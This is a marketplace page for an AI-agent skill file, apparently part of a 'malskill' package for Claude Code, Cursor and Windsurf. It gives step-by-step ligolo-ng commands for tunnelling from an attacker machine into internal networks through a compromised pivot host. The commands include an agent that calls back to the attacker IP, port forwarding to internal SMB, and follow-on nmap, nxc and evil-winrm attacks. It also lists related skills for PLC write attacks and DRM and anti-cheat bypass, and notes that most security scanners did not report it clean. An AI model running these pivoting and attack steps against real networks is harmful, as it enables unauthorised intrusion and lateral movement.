offensive-tools/network/ligolo-ng/SKILL.md
Reverse tunneling tool that creates a TUN interface on the attacker machine to route traffic into internal networks via a compromised pivot host. Use when asked to pivot into an internal network, tunnel traffic through a compromised host, access internal subnets, or set up a network tunnel without SOCKS proxychains.
npx skillsauth add aeondave/malskill ligolo-ngInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Reverse tunneling via TUN interface — cleaner pivot than SOCKS/proxychains, works at network layer.
Attacker (proxy) ←—TLS tunnel— Victim pivot (agent) ——→ Internal network
[TUN iface] [compromised host] 192.168.1.0/24
No proxychains needed — all tools work natively against internal IP ranges.
# Attacker: create TUN interface and start proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
# Victim pivot host: connect agent to proxy
./agent -connect <attacker_ip>:11601 -ignore-cert
# Back on attacker proxy console:
session # select the agent session
start # start tunneling
# Add route to internal subnet via TUN interface
sudo ip route add 192.168.1.0/24 dev ligolo
| Command | Description |
|---------|-------------|
| session | List / select active sessions |
| start | Start tunnel for selected session |
| stop | Stop tunnel |
| ifconfig | Show remote interfaces/subnets |
| listener_add | Add port forwarder (agent→proxy) |
| listener_list | List active listeners |
| listener_stop | Stop a listener |
To expose an internal service to the attacker:
# In proxy console (after selecting session):
listener_add --addr 0.0.0.0:4444 --to 192.168.1.5:445 --tcp
# Now target attacker:4444 → internal 192.168.1.5:445
# Full pivot setup
# Step 1: Start proxy (attacker)
sudo ./proxy -selfcert -laddr 0.0.0.0:11601
# Step 2: Run agent on pivot (upload via web server or existing shell)
# Linux pivot:
./agent -connect 10.10.14.1:11601 -ignore-cert &
# Windows pivot:
agent.exe -connect 10.10.14.1:11601 -ignore-cert
# Step 3: Add route (attacker)
# In proxy console:
session # ID: 1 - pivot-host
start
# In terminal:
sudo ip route add 10.200.1.0/24 dev ligolo
# Step 4: Use internal IPs directly
nmap -sS 10.200.1.0/24
nxc smb 10.200.1.0/24
evil-winrm -i 10.200.1.50 -u admin -p pass
For nested networks (attacker → pivot1 → pivot2 → internal):
| File | When to load |
|------|--------------|
| references/pivot-setup.md | Double pivot, TLS certificate setup, agent persistence, Windows service install |
data-ai
Scoped routing: Linux operator; hosts, sessions, users, services, packages, logs, containers, SSH, network paths, privilege evidence.
development
Offensive methodology for ICS/OT/SCADA environments in authorized industrial penetration testing and red team operations. Use when assessing PLCs, RTUs, HMIs, engineering workstations, historians, or field devices running Modbus, DNP3, EtherNet/IP, S7comm/S7+, Profinet, IEC 60870-5-104, BACnet, or OPC-UA. Covers passive OT network enumeration, protocol-level device interrogation, PLC coil/register read-write attacks, HMI session exploitation, historian and engineering workstation compromise, and safe escalation rules for critical infrastructure scope. Does not cover: general IT network exploitation (network-technique), physical hardware interfaces UART/JTAG/SPI (hardware-technique), wireless sensor network attacks (wireless-technique), RF/SDR signal analysis (hardware-ctf or wireless-technique), or CTF-framed ICS lab tasks (ics-ctf).
tools
Offensive methodology for authorized game security assessments, game client security research, and game-adjacent penetration testing in real-world engagements. Use when assessing game clients for cheating vulnerabilities, testing anti-cheat effectiveness, auditing game server protocols for score manipulation or economic fraud, reverse engineering game DRM or license validation, analyzing game save file protection, or assessing game mod/plugin security. Covers: process memory scanning and manipulation (Cheat Engine methodology), game binary reversing for license and DRM bypass, game network protocol analysis and packet replay, anti-cheat mechanism analysis, save file format reversing and tampering, speed hack and value injection techniques. Does NOT cover: CTF game challenges (game-ctf), game engine source code auditing (web-exploit-technique or vuln-search-technique for the backend), or general binary exploitation (pwn-ctf or reversing-technique).
development
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.